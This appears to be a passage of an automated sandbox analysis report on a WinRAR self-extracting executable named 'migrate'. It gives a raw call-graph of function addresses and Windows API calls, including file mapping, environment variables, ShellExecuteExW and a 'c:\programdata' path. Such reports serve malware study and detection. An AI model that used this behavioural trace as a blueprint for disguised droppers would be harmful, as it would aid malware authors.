12c73f 97 API calls 24479->24476 24480 12b9d9 24602 11a0b1 24480->24602 24491 12c73f 97 API calls 24481->24491 24547 12c0d8 24481->24547 24486 12d4d4 16 API calls 24483->24486 24488 12c003 SetDlgItemTextW 24484->24488 24486->24480 24487 12c18b 24492 12c194 EnableWindow 24487->24492 24493 12c19d 24487->24493 24495 11e617 53 API calls 24488->24495 24489 12ba73 24608 12ac04 SetCurrentDirectoryW 24489->24608 24490 12ba68 GetLastError 24490->24489 24497 12c03b 24491->24497 24492->24493 24498 12c1ba 24493->24498 24718 1112d3 GetDlgItem EnableWindow 24493->24718 24494 12beed 24501 11e617 53 API calls 24494->24501 24499 12c017 SetDlgItemTextW 24495->24499 24503 12c04d 24497->24503 24533 12c072 24497->24533 24506 12c1e1 24498->24506 24518 12c1d9 SendMessageW 24498->24518 24499->24481 24500 12ba87 24507 12ba90 GetLastError 24500->24507 24508 12ba9e 24500->24508 24501->24502 24716 129ed5 32 API calls 24503->24716 24504 12c0cb 24509 12c73f 97 API calls 24504->24509 24506->24502 24519 11e617 53 API calls 24506->24519 24507->24508 24511 12bb11 24508->24511 24514 12bb20 24508->24514 24520 12baae GetTickCount 24508->24520 24509->24547 24511->24514 24515 12bd56 24511->24515 24512 12c1b0 24719 1112d3 GetDlgItem EnableWindow 24512->24719 24513->24494 24521 11e617 53 API calls 24513->24521 24522 12bcfb 24514->24522 24524 12bcf1 24514->24524 24525 12bb39 GetModuleFileNameW 24514->24525 24617 1112f1 GetDlgItem ShowWindow 24515->24617 24516 12c066 24516->24533 24518->24506 24527 12b862 24519->24527 24528 114092 _swprintf 51 API calls 24520->24528 24529 12bed0 24521->24529 24532 11e617 53 API calls 24522->24532 24523 12c169 24717 129ed5 32 API calls 24523->24717 24524->24435 24524->24522 24708 11f28c 24525->24708 24527->24469 24527->24502 24535 12bac7 24528->24535 24536 114092 _swprintf 51 API calls 24529->24536 24539 12bd05 24532->24539 24533->24504 24540 12c73f 97 API calls 24533->24540 24534 12bd66 24618 1112f1 GetDlgItem ShowWindow 24534->24618 24609 11966e 24535->24609 24536->24494 24537 12c188 24537->24487 24544 114092 _swprintf 51 API calls 24539->24544 24545 12c0a0 24540->24545 24542 11e617 53 API calls 24542->24547 24543 114092 _swprintf 51 API calls 24548 12bb81 CreateFileMappingW 24543->24548 24549 12bd23 24544->24549 24545->24504 24550 12c0a9 DialogBoxParamW 24545->24550 24546 12bd70 24551 11e617 53 API calls 24546->24551 24547->24487 24547->24523 24547->24542 24553 12bbe3 GetCommandLineW 24548->24553 24554 12bc60 __InternalCxxFrameHandler 24548->24554 24563 11e617 53 API calls 24549->24563 24550->24435 24550->24504 24555 12bd7a SetDlgItemTextW 24551->24555 24557 12bbf4 24553->24557 24558 12bc6b ShellExecuteExW 24554->24558 24619 1112f1 GetDlgItem ShowWindow 24555->24619 24556 12baed 24560 12baff 24556->24560 24561 12baf4 GetLastError 24556->24561 24712 12b425 SHGetMalloc 24557->24712 24573 12bc88 24558->24573 24565 11959a 80 API calls 24560->24565 24561->24560 24567 12bd3d 24563->24567 24564 12bd8c SetDlgItemTextW GetDlgItem 24568 12bdc1 24564->24568 24569 12bda9 GetWindowLongW SetWindowLongW 24564->24569 24565->24511 24566 12bc10 24713 12b425 SHGetMalloc 24566->24713 24620 12c73f 24568->24620 24569->24568 24572 12bc1c 24714 12b425 SHGetMalloc 24572->24714 24585 12bcb7 Sleep 24573->24585 24586 12bccb 24573->24586 24576 12c73f 97 API calls 24578 12bddd 24576->24578 24577 12bc28 24580 11f3fa 82 API calls 24577->24580 24645 12da52 24578->24645 24579 12bce1 UnmapViewOfFile CloseHandle 24579->24524 24583 12bc3f MapViewOfFile 24580->24583 24583->24554 24584 12c73f 97 API calls 24589 12be03 24584->24589 24585->24573 24585->24586 24586->24524 24586->24579 24587 12be2c 24715 1112d3 GetDlgItem EnableWindow 24587->24715 24589->24587 24591 12c73f 97 API calls 24589->24591 24590->24435 24590->24459 24591->24587 24593 111378 24592->24593 24594 11131f 24592->24594 24721 11e2c1 GetWindowLongW SetWindowLongW 24593->24721 24596 111385 24594->24596 24720 11e2e8 62 API calls 2 library calls 24594->24720 24596->24428 24596->24429 24596->24502 24598 111341 24598->24596 24599 111354 GetDlgItem 24598->24599 24599->24596 24600 111364 24599->24600 24600->24596 24601 11136a SetWindowTextW 24600->24601 24601->24596 24603 11a0bb 24602->24603 24604 11a175 24603->24604 24605 11a14c 24603->24605 24722 11a2b2 24603->24722 24604->24489 24604->24490 24605->24604 24606 11a2b2 8 API calls 24605->24606 24606->24604 24608->24500 24610 119678 24609->24610 24611 1196d5 CreateFileW 24610->24611 24612 1196c9 24610->24612 24611->24612 24613 11bb03 GetCurrentDirectoryW 24612->24613 24614 11971f 24612->24614 24615 119704 24613->24615 24614->24556 24615->24614 24616 119708 CreateFileW 24615->24616 24616->24614 24617->24534 24618->24546 24619->24564 24621 12c749 __EH_prolog 24620->24621 24622 12bdcf 24621->24622 24623 12b314 ExpandEnvironmentStringsW 24621->24623 24622->24576 24629 12c780 _wcslen _wcsrchr 24623->24629 24625 12b314 ExpandEnvironmentStringsW 24625->24629 24626 12ca67 SetWindowTextW 24626->24629 24629->24622 24629->24625 24629->24626 24630 133e3e 22 API calls 24629->24630 24632 12c855 SetFileAttributesW 24629->24632 24637 12cc31 GetDlgItem SetWindowTextW SendMessageW 24629->24637 24640 12cc71 SendMessageW 24629->24640 24743 121fbb CompareStringW 24629->24743 24744 12a64d GetCurrentDirectoryW 24629->24744 24746 11a5d1 6 API calls 24629->24746 24747 11a55a FindClose 24629->24747 24748 12b48e 76 API calls 2 library calls 24629->24748 24630->24629 24633 12c90f GetFileAttributesW 24632->24633 24644 12c86f __cftof _wcslen 24632->24644 24633->24629 24636 12c921 DeleteFileW 24633->24636 24636->24629 24638 12c932 24636->24638 24637->24629 24639 114092 _swprintf 51 API calls 24638->24639 24641 12c952 GetFileAttributesW 24639->24641 24640->24629 24641->24638 24642 12c967 MoveFileW 24641->24642 24642->24629 24643 12c97f MoveFileExW 24642->24643 24643->24629 24644->24629 24644->24633 24745 11b991 51 API calls 2 library calls 24644->24745 24646 12da5c __EH_prolog 24645->24646 24749 120659 24646->24749 24648 12da8d 24753 115b3d 24648->24753 24650 12daab 24757 117b0d 24650->24757 24654 12dafe 24773 117b9e 24654->24773 24656 12bdee 24656->24584 24658 12d6a8 24657->24658 24659 12a5c6 4 API calls 24658->24659 24660 12d6ad 24659->24660 24661 12bf15 24660->24661 24662 12d6b5 GetWindow 24660->24662 24661->24437 24661->24438 24662->24661 24668 12d6d5 24662->24668 24663 12d6e2 GetClassNameW 25258 121fbb CompareStringW 24663->25258 24665 12d706 GetWindowLongW 24666 12d76a GetWindow 24665->24666 24667 12d716 SendMessageW 24665->24667 24666->24661 24666->24668 24667->24666 24669 12d72c GetObjectW 24667->24669 24668->24661 24668->24663 24668->24665 24668->24666 25259 12a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24669->25259 24671 12d743 25260 12a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24671->25260 25261 12a80c 8 API calls 24671->25261 24674 12d754 SendMessageW DeleteObject 24674->24666 24675->24452 24677 12abf1 24676->24677 24678 12abcc 24676->24678 24680 12abf6 SHAutoComplete 24677->24680 24681 12abff 24677->24681 25262 121fbb CompareStringW 24678->25262 24680->24681 24684 12b093 24681->24684 24682 12abdf 24682->24677 24683 12abe3 FindWindowExW 24682->24683 24683->24677 24685 12b09d __EH_prolog 24684->24685 24686 1113dc 84 API calls 24685->24686 24687 12b0bf 24686->24687 25263 111fdc 24687->25263 24690 12b0eb 24692 1119af 128 API calls 24690->24692 24691 12b0d9 24693 111692 86 API calls 24691->24693 24696 12b10d __InternalCxxFrameHandler ___std_exception_copy 24692->24696 24694 12b0e4 24693->24694 24694->24476 24694->24479 24695 111692 86 API calls 24695->24694 24696->24695 24697->24527 24699 12b568 5 API calls 24698->24699 24700 12d4e0 GetDlgItem 24699->24700 24701 12d502 24700->24701 24702 12d536 SendMessageW SendMessageW 24700->24702 24705 12d50d ShowWindow SendMessageW SendMessageW 24701->24705 24703 12d572 24702->24703 24704 12d591 SendMessageW SendMessageW SendMessageW 24702->24704 24703->24704 24706 12d5e7 SendMessageW 24704->24706 24707 12d5c4 SendMessageW 24704->24707 24705->24702 24706->24480 24707->24706 24709 11f295 24708->24709 24710 11f2ae 24708->24710 24711 11f303 82 API calls 24709->24711 24710->24543 24711->24710 24712->24566 24713->24572 24714->24577 24715->24590 24716->24516 24717->24537 24718->24512 24719->24498 24720->24598 24721->24596 24723 11a2bf 24722->24723 24724 11a2e3 24723->24724 24725 11a2d6 CreateDirectoryW 24723->24725 24726 11a231 3 API calls 24724->24726 24725->24724 24727 11a316 24725->24727 24728 11a2e9 24726->24728 24729 11a325 24727->24729 24735 11a4ed 24727->24735 24730 11a329 GetLastError 24728->24730 24732 11bb03 GetCurrentDirectoryW 24728->24732 24729->24603 24730->24729 24733 11a2ff 24732->24733 24733->24730 24734 11a303 CreateDirectoryW 24733->24734 24734->24727 24734->24730 24736 12ec50 24735->24736 24737 11a4fa SetFileAttributesW 24736->24737 24738 11a510 24737->24738 24739 11a53d 24737->24739 24740 11bb03 GetCurrentDirectoryW 24738->24740 24739->24729 24741 11a524 24740->24741 24741->24739 24742 11a528 SetFileAttributesW 24741->24742 24742->24739 24743->24629 24744->24629 24745->24644 24746->24629 24747->24629 24748->24629 24750 120666 _wcslen 24749->24750 24777 1117e9 24750->24777 24752 12067e 24752->24648 24754 120659 _wcslen 24753->24754 24755 1117e9 78 API calls 24754->24755 24756 12067e 24755->24756 24756->24650 24758 117b17 __EH_prolog 24757->24758 24794 11ce40 24758->24794 24760 117b32 24761 12eb38 8 API calls 24760->24761 24762 117b5c 24761->24762 24800 124a76 24762->24800 24765 117c7d 24766 117c87 24765->24766 24768 117cf1 24766->24768 24829 11a56d 24766->24829 24770 117d50 24768->24770 24807 118284 24768->24807 24769 117d92 24769->24654 24770->24769 24835 11138b 74 API calls 24770->24835 24774 117bac 24773->24774 24776 117bb3 24773->24776 24775 122297 86 API calls 24774->24775 24775->24776 24778 1117ff 24777->24778 24789 11185a __InternalCxxFrameHandler 24777->24789 24779 111828 24778->24779 24790 116c36 76 API calls __vswprintf_c_l 24778->24790 24780 111887 24779->24780 24786 111847 ___std_exception_copy 24779->24786 24783 133e3e 22 API calls 24780->24783 24782 11181e 24791 116ca7 75 API calls 24782->24791 24785 11188e 24783->24785 24785->24789 24793 116ca7 75 API calls 24785->24793 24786->24789 24792 116ca7 75 API calls 24786->24792 24789->24752 24790->24782 24791->24779 24792->24789 24793->24789 24795 11ce4a __EH_prolog 24794->24795 24796 12eb38 8 API calls 24795->24796 24797 11ce8d 24796->24797 24798 12eb38 8 API calls 24797->24798 24799 11ceb1 24798->24799 24799->24760 24801 124a80 __EH_prolog 24800->24801 24802 12eb38 8 API calls 24801->24802 24803 124a9c 24802->24803 24804 117b8b 24803->24804 24806 120e46 80 API calls 24803->24806 24804->24765 24806->24804 24808 11828e __EH_prolog 24807->24808 24836 1113dc 24808->24836 24810 1182aa 24811 1182bb 24810->24811 24979 119f42 24810->24979 24816 1182f2 24811->24816 24844 111a04 24811->24844 24975 111692 24816->24975 24817 118389 24863 118430 24817->24863 24820 1183e8 24871 111f6d 24820->24871 24824 1183f3 24824->24816 24875 113b2d 24824->24875 24887 11848e 24824->24887 24825 11a56d 7 API calls 24827 1182ee 24825->24827 24827->24816 24827->24817 24827->24825 24983 11c0c5 CompareStringW _wcslen 24827->24983 24830 11a582 24829->24830 24831 11a5b0 24830->24831 25247 11a69b 24830->25247 24831->24766 24833 11a592 24833->24831 24834 11a597 FindClose 24833->24834 24834->24831 24835->24769 24837 1113e1 __EH_prolog 24836->24837 24838 11ce40 8 API calls 24837->24838 24839 111419 24838->24839 24840 12eb38 8 API calls 24839->24840 24843 111474 __cftof 24839->24843 24841 111461 24840->24841 24842 11b505 84 API calls 24841->24842 24841->24843 24842->24843 24843->24810 24845 111a0e __EH_prolog 24844->24845 24855 111b9b 24845->24855 24858 111a61 24845->24858 24984 1113ba 24845->24984 24847 111bc7 24987 11138b 74 API calls 24847->24987 24850 113b2d 101 API calls 24854 111c12 24850->24854 24851 111bd4 24851->24850 24851->24855 24852 111c5a 24852->24855 24857 111c8d 24852->24857 24988 11138b 74 API calls 24852->24988 24854->24852 24856 113b2d 101 API calls 24854->24856 24855->24827 24856->24854 24857->24855 24861 119e80 79 API calls 24857->24861 24858->24847 24858->24851 24858->24855 24859 113b2d 101 API calls 24860 111cde 24859->24860 24860->24855 24860->24859 24861->24860 24862 119e80 79 API calls 24862->24858 25006 11cf3d 24863->25006 24865 118440 25010 1213d2 GetSystemTime SystemTimeToFileTime 24865->25010 24867 1183a3 24867->24820 24868 121b66 24867->24868 25011 12de6b 24868->25011 24872 111f72 __EH_prolog 24871->24872 24874 111fa6 24872->24874 25019 1119af 24872->25019 24874->24824 24876 113b39 24875->24876 24877 113b3d 24875->24877 24876->24824 24886 119e80 79 API calls 24877->24886 24878 113b4f 24879 113b78 24878->24879 24880 113b6a 24878->24880 25182 11286b 101 API calls 3 library calls 24879->25182 24885 113baa 24880->24885 25181 1132f7 89 API calls 2 library calls 24880->25181 24883 113b76 24883->24885 25183 1120d7 74 API calls 24883->25183 24885->24824 24886->24878 24888 118498 __EH_prolog 24887->24888 24891 1184d5 24888->24891 24902 118513 24888->24902 25208 128c8d 103 API calls 24888->25208 24890 1184f5 24892 1184fa 24890->24892 24893 11851c 24890->24893 24891->24890 24895 11857a 24891->24895 24891->24902 24892->24902 25209 117a0d 152 API calls 24892->25209 24893->24902 25210 128c8d 103 API calls 24893->25210 24895->24902 25184 115d1a 24895->25184 24898 118605 24898->24902 25190 118167 24898->25190 24901 118797 24903 11a56d 7 API calls 24901->24903 24905 118802 24901->24905 24902->24824 24903->24905 24904 11d051 82 API calls 24912 11885d 24904->24912 25196 117c0d 24905->25196 24907 11898b 25213 112021 74 API calls 24907->25213 24908 118992 24909 118a5f 24908->24909 24914 1189e1 24908->24914 24913 118ab6 24909->24913 24925 118a6a 24909->24925 24912->24902 24912->24904 24912->24907 24912->24908 25211 118117 84 API calls 24912->25211 25212 112021 74 API calls 24912->25212 24920 118a4c 24913->24920 25216 117fc0 97 API calls 24913->25216 24916 11a231 3 API calls 24914->24916 24914->24920 24922 118b14 24914->24922 24915 11959a 80 API calls 24915->24902 24921 118a19 24916->24921 24917 118b82 24923 11ab1a 8 API calls 24917->24923 24919 11959a 80 API calls 24919->24902 24920->24922 24931 118ab4 24920->24931 24921->24920 25214 1192a3 97 API calls 24921->25214 24922->24917 24962 119105 24922->24962 25217 1198bc 24922->25217 24926 118bd1 24923->24926 24925->24931 25215 117db2 101 API calls 24925->25215 24929 11ab1a 8 API calls 24926->24929 24946 118be7 24929->24946 24931->24915 24933 118b70 25221 116e98 77 API calls 24933->25221 24935 118cbc 24936 118e40 24935->24936 24937 118d18 24935->24937 24940 118e52 24936->24940 24941 118e66 24936->24941 24960 118d49 24936->24960 24938 118d8a 24937->24938 24939 118d28 24937->24939 24948 118167 19 API calls 24938->24948 24943 118d6e 24939->24943 24951 118d37 24939->24951 24944 119215 123 API calls 24940->24944 24942 123377 75 API calls 24941->24942 24945 118e7f 24942->24945 24943->24960 25224 1177b8 111 API calls 24943->25224 24944->24960 24949 123020 123 API calls 24945->24949 24946->24935 24947 118c93 24946->24947 24954 11981a 79 API calls 24946->24954 24947->24935 25222 119a3c 82 API calls 24947->25222 24952 118dbd 24948->24952 24949->24960 25223 112021 74 API calls 24951->25223 24956 118df5 24952->24956 24957 118de6 24952->24957 24952->24960 24954->24947 25226 119155 93 API calls __EH_prolog 24956->25226 25225 117542 85 API calls 24957->25225 24963 118f85 24960->24963 25227 112021 74 API calls 24960->25227 24962->24919 24963->24962 24965 11903e 24963->24965 24973 119090 24963->24973 25202 119f09 SetEndOfFile 24963->25202 24964 11a4ed 3 API calls 24966 1190eb 24964->24966 25203 119da2 24965->25203 24966->24962 25228 112021 74 API calls 24966->25228 24969 119085 24971 119620 77 API calls 24969->24971 24971->24973 24972 1190fb 25229 116dcb 76 API calls 24972->25229 24973->24962 24973->24964 24976 1116a4 24975->24976 25245 11cee1 86 API calls 24976->25245 24980 119f59 24979->24980 24981 119f63 24980->24981 25246 116d0c 78 API calls 24980->25246 24981->24811 24983->24827 24989 111732 24984->24989 24986 1113d6 24986->24862 24987->24855 24988->24857 24990 111748 24989->24990 25001 1117a0 __InternalCxxFrameHandler 24989->25001 24991 111771 24990->24991 25002 116c36 76 API calls __vswprintf_c_l 24990->25002 24992 1117c7 24991->24992 24993 11178d ___std_exception_copy 24991->24993 24995 133e3e 22 API calls 24992->24995 24993->25001 25004 116ca7 75 API calls 24993->25004 24998 1117ce 24995->24998 24996 111767 25003 116ca7 75 API calls 24996->25003 24998->25001 25005 116ca7 75 API calls 24998->25005 25001->24986 25002->24996 25003->24991 25004->25001 25005->25001 25007 11cf4d 25006->25007 25009 11cf54 25006->25009 25008 11981a 79 API calls 25007->25008 25008->25009 25009->24865 25010->24867 25012 12de78 25011->25012 25013 11e617 53 API calls 25012->25013 25014 12de9b 25013->25014 25015 114092 _swprintf 51 API calls 25014->25015 25016 12dead 25015->25016 25017 12d4d4 16 API calls 25016->25017 25018 121b7c 25017->25018 25018->24820 25020 1119bb 25019->25020 25021 1119bf 25019->25021 25020->24874 25023 1118f6 25021->25023 25024 111945 25023->25024 25025 111908 25023->25025 25031 113fa3 25024->25031 25026 113b2d 101 API calls 25025->25026 25029 111928 25026->25029 25029->25020 25035 113fac 25031->25035 25032 113b2d 101 API calls 25032->25035 25033 111966 25033->25029 25036 111e50 25033->25036 25035->25032 25035->25033 25048 120e08 25035->25048 25037 111e5a __EH_prolog 25036->25037 25056 113bba 25037->25056 25039 111e84 25040 111732 78 API calls 25039->25040 25043 111f0b 25039->25043 25041 111e9b 25040->25041 25084 1118a9 78 API calls 25041->25084 25043->25029 25044 111eb3 25046 111ebf _wcslen 25044->25046 25085 121b84 MultiByteToWideChar 25044->25085 25086 1118a9 78 API calls 25046->25086 25049 120e0f 25048->25049 25050 120e2a 25049->25050 25054 116c31 RaiseException CallUnexpected 25049->25054 25052 120e3b SetThreadExecutionState 25050->25052 25055 116c31 RaiseException CallUnexpected 25050->25055 25052->25035 25054->25050 25055->25052 25057 113bc4 __EH_prolog 25056->25057 25058 113bf6 25057->25058 25059 113bda 25057->25059 25061 113e51 25058->25061 25064 113c22 25058->25064 25112 11138b 74 API calls 25059->25112 25137 11138b 74 API calls 25061->25137 25063 113be5 25063->25039 25064->25063 25087 123377 25064->25087 25066 113ca3 25067 113d2e 25066->25067 25083 113c9a 25066->25083 25115 11d051 25066->25115 25097 11ab1a 25067->25097 25068 113c9f 25068->25066 25114 1120bd 78 API calls 25068->25114 25070 113c71 25070->25066 25070->25068 25071 113c8f 25070->25071 25113 11138b 74 API calls 25071->25113 25074 113d41 25077 113dd7 25074->25077 25078 113dc7 25074->25078 25121 123020 25077->25121 25101 119215 25078->25101 25081 113dd5 25081->25083 25130 112021 74 API calls 25081->25130 25131 122297 25083->25131 25084->25044 25085->25046 25086->25043 25088 123396 ___std_exception_copy 25087->25088 25089 12338c 25087->25089 25091 12341c 25088->25091 25092 1234c6 25088->25092 25096 123440 __cftof 25088->25096 25138 116ca7 75 API calls 25089->25138 25139 1232aa 75 API calls 3 library calls 25091->25139 25140 13238d RaiseException 25092->25140 25095 1234f2 25096->25070 25098 11ab28 25097->25098 25100 11ab32 25097->25100 25099 12eb38 8 API calls 25098->25099 25099->25100 25100->25074 25102 11921f __EH_prolog 25101->25102 25141 117c64 25102->25141 25105 1113ba 78 API calls 25106 119231 25105->25106 25144 11d114 25106->25144 25108 11928a 25108->25081 25110 11d114 118 API calls 25111 119243 25110->25111 25111->25108 25111->25110 25153 11d300 97 API calls __InternalCxxFrameHandler 25111->25153 25112->25063 25113->25083 25114->25066 25116 11d072 25115->25116 25117 11d084 25115->25117 25154 11603a 25116->25154 25119 11603a 82 API calls 25117->25119 25120 11d07c 25119->25120 25120->25067 25122 123052 25121->25122 25123 123029 25121->25123 25129 123046 25122->25129 25179 12552f 123 API calls 2 library calls 25122->25179 25124 123048 25123->25124 25126 12303e 25123->25126 25123->25129 25178 12624a 118 API calls 25124->25178 25165 126cdc 25126->25165 25129->25081 25130->25083 25132 1222a1 25131->25132 25133 1222ba 25132->25133 25136 1222ce 25132->25136 25180 120eed 86 API calls 25133->25180 25135 1222c1 25135->25136 25137->25063 25138->25088 25139->25096 25140->25095 25142 11b146 GetVersionExW 25141->25142 25143 117c69 25142->25143 25143->25105 25150 11d12a __InternalCxxFrameHandler 25144->25150 25145 11d29a 25146 11d2ce 25145->25146 25147 11d0cb 6 API calls 25145->25147 25148 120e08 SetThreadExecutionState RaiseException 25146->25148 25147->25146 25151 11d291 25148->25151 25149 128c8d 103 API calls 25149->25150 25150->25145 25150->25149 25150->25151 25152 11ac05 91 API calls 25150->25152 25151->25111 25152->25150 25153->25111 25155 116059 25154->25155 25164 1160d5 25154->25164 25156 11f28c 82 API calls 25155->25156 25155->25164 25157 116081 25156->25157 25158 121da7 WideCharToMultiByte 25157->25158 25159 116094 25158->25159 25160 1160d7 25159->25160 25161 116099 25159->25161 25162 116122 82 API calls 25160->25162 25163 1163e2 82 API calls 25161->25163 25161->25164 25162->25164 25163->25164 25164->25120 25166 12359e 75 API calls 25165->25166 25173 126ced __InternalCxxFrameHandler 25166->25173 25167 11d114 118 API calls 25167->25173 25168 1270fe 25169 125202 98 API calls 25168->25169 25170 12710e __InternalCxxFrameHandler 25169->25170 25170->25129 25171 1211cf 81 API calls 25171->25173 25172 123e0b 118 API calls 25172->25173 25173->25167 25173->25168 25173->25171 25173->25172 25174 120f86 88 API calls 25173->25174 25175 127153 118 API calls 25173->25175 25176 12390d 98 API calls 25173->25176 25177 1277ef 123 API calls 25173->25177 25174->25173 25175->25173 25176->25173 25177->25173 25178->25129 25179->25129 25180->25135 25181->24883 25182->24883 25183->24885 25185 115d2a 25184->25185 25230 115c4b 25185->25230 25187 115d95 25187->24898 25189 115d5d 25189->25187 25235 11b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25189->25235 25191 118186 25190->25191 25192 118232 25191->25192 25242 11be5e 19 API calls __InternalCxxFrameHandler 25191->25242 25241 121fac CharUpperW 25192->25241 25195 11823b 25195->24901 25197 117c22 25196->25197 25198 117c5a 25197->25198 25243 116e7a 74 API calls 25197->25243 25198->24912 25200 117c52 25244 11138b 74 API calls 25200->25244 25202->24965 25204 119db3 25203->25204 25205 119dc2 25203->25205 25204->25205 25206 119db9 FlushFileBuffers 25204->25206 25207 119e3f SetFileTime 25205->25207 25206->25205 25207->24969 25208->24891 25209->24902 25210->24902 25211->24912 25212->24912 25213->24908 25214->24920 25215->24931 25216->24920 25218 118b5a 25217->25218 25219 1198c5 GetFileType 25217->25219 25218->24917 25220 112021 74 API calls 25218->25220 25219->25218 25220->24933 25221->24917 25222->24935 25223->24960 25224->24960 25225->24960 25226->24960 25227->24963 25228->24972 25229->24962 25236 115b48 25230->25236 25232 115c6c 25232->25189 25234 115b48 2 API calls 25234->25232 25235->25189 25239 115b52 25236->25239 25237 115c3a 25237->25232 25237->25234 25239->25237 25240 11b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25239->25240 25240->25239 25241->25195 25242->25192 25243->25200 25244->25198 25246->24981 25248 11a6a8 25247->25248 25249 11a6c1 FindFirstFileW 25248->25249 25250 11a727 FindNextFileW 25248->25250 25251 11a6d0 25249->25251 25257 11a709 25249->25257 25252 11a732 GetLastError 25250->25252 25250->25257 25253 11bb03 GetCurrentDirectoryW 25251->25253 25252->25257 25254 11a6e0 25253->25254 25255 11a6e4 FindFirstFileW 25254->25255 25256 11a6fe GetLastError 25254->25256 25255->25256 25255->25257 25256->25257 25257->24833 25258->24668 25259->24671 25260->24671 25261->24674 25262->24682 25264 119f42 78 API calls 25263->25264 25265 111fe8 25264->25265 25266 111a04 101 API calls 25265->25266 25269 112005 25265->25269 25267 111ff5 25266->25267 25267->25269 25270 11138b 74 API calls 25267->25270 25269->24690 25269->24691 25270->25269 25468 1294e0 GetClientRect 25494 1221e0 26 API calls std::bad_exception::bad_exception 25508 12f2e0 46 API calls __RTC_Initialize 25509 13bee0 GetCommandLineA GetCommandLineW 25271 12eae7 25272 12eaf1 25271->25272 25273 12e85d ___delayLoadHelper2@8 14 API calls 25272->25273 25274 12eafe 25273->25274 25469 12f4e7 29 API calls _abort 25276 11f1e8 25277 11f1f0 FreeLibrary 25276->25277 25278 11f1f8 25276->25278 25277->25278

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 0012DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00120863: GetModuleHandleW.KERNEL32(kernel32), ref: 0012087C
                                                                                                                                                                                                      • Part of subcall function 00120863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0012088E
                                                                                                                                                                                                      • Part of subcall function 00120863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001208BF
                                                                                                                                                                                                      • Part of subcall function 0012A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0012A655
                                                                                                                                                                                                      • Part of subcall function 0012AC16: OleInitialize.OLE32(00000000), ref: 0012AC2F
                                                                                                                                                                                                      • Part of subcall function 0012AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0012AC66
                                                                                                                                                                                                      • Part of subcall function 0012AC16: SHGetMalloc.SHELL32(00158438), ref: 0012AC70
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0012DF5C
                                                                                                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0012DF83
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0012DF94
                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0012DFCE
                                                                                                                                                                                                      • Part of subcall function 0012DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0012DBF4
                                                                                                                                                                                                      • Part of subcall function 0012DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0012DC30
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0012DFD7
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0016EC90,00000800), ref: 0012DFF2
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0016EC90), ref: 0012DFFE
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0012E009
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012E048
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0012E05A
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0012E061
                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0012E078
                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0012E0C9
                                                                                                                                                                                                    • Sleep.KERNEL32(?), ref: 0012E0F7
                                                                                                                                                                                                    • DeleteObject.GDI32 ref: 0012E130
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0012E140
                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0012E183
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$c:\programdata$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 3049964643-3155487436
                                                                                                                                                                                                    • Opcode ID: 23b87e63729b6594c27c3efc98e4caf534e4fd1c184cee7e95d5989228e65eaa
                                                                                                                                                                                                    • Instruction ID: e75a10e3d4bb0b6a96b683ca89a6d79e5baad7cf16b490bfe372745c9e8c5838
